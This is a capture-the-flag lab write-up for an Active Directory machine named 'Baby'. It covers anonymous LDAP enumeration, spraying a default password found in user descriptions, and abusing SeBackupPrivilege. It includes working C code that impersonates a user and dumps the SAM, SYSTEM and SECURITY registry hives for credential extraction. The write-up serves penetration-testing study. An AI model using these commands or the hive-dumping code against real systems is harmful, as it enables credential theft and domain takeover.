🚼Baby

You will learn about LDAP-Enumeration & Windows Privileges

IP: 10.10.117.218

Enumeration

This is a standalone machine

One thing we can do after scanning ports is scan ldap using nmap

nmap -n -sV --script "ldap* and not brute" 10.10.117.218 -vv -oN nmap/ldapsearch -Pn

Here we get the informations about the domain, the machine name, ldap policies and AD users

We can check if anonymous LDAP bind is enabled so we can enumerate users from there

ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" "user" | grep cn

We now have a list of users present in the Active directory

Now if we remove user from the command, ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" we see more informations about every user for example the descriptions

BabyStart123! is probably the default password that is set for this or other accounts

We can create a list of users and spray the password

It did not work

But looking again at the users we also find Caroline.Robinson that for some reason did not have a user principal name so the command used to cat the users did not display her

Now using crackmapexec we see that her password needs to be changed

We can use Impacket’s smpasswd to change her password

Privilege Escalation

Now enumerating the privileges of this user we can see that SeBackupPrivilegeand SeRestorePrivilegeare enabled probably because this user is a Backup operator

We can copy SAM and SYSTEM but we also need ntds.dit

We can use a script that mounts the c drive to a E: drive using the diskshadow utility

But for some unknown reasons after trying countless times it did not work

So i used this code to copy the different hives to C:\Windows\Temp

#include <stdio.h>
#include <Windows.h>

void MakeToken() {
    HANDLE token;
    const char username[] = "Caroline.Robinson";
    const char password[] = "Password123!";
    const char domain[] = "baby.vl";

    if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
        printf("LogonUserA: %d\n", GetLastError());
        exit(0);
    }
    if (ImpersonateLoggedOnUser(token) == 0) {
        printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
        exit(0);
    }
}

int main()
{
    HKEY hklm;
    HKEY hkey;
    DWORD result;
    const char* hives[] = { "SAM","SYSTEM","SECURITY" };
    const char* files[] = { "C:\\windows\\temp\\sam.hive","C:\\windows\\temp\\system.hive","C:\\windows\\temp\\security.hive" };

    //Uncomment if using alternate credentials.
    MakeToken();

    result = RegConnectRegistryA("\\\\baby.vl", HKEY_LOCAL_MACHINE, &hklm);
    if (result != 0) {
        printf("RegConnectRegistryW: %d\n", result);
        exit(0);
    }
    for (int i = 0; i < 3; i++) {

        printf("Dumping %s hive to %s\n", hives[i], files[i]);
        result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
        if (result != 0) {
            printf("RegOpenKeyExA: %d\n", result);
            exit(0);
        }
        result = RegSaveKeyA(hkey, files[i], NULL);
        if (result != 0) {
            printf("RegSaveKeyA: %d\n", result);
            exit(0);
        }
    }
}

Now we get the NT hash of the machine account babydc$

Then login with the Administrator account and we are DA

PreviousTrusted NextHybrid

Last updated 2 years ago

Was this helpful?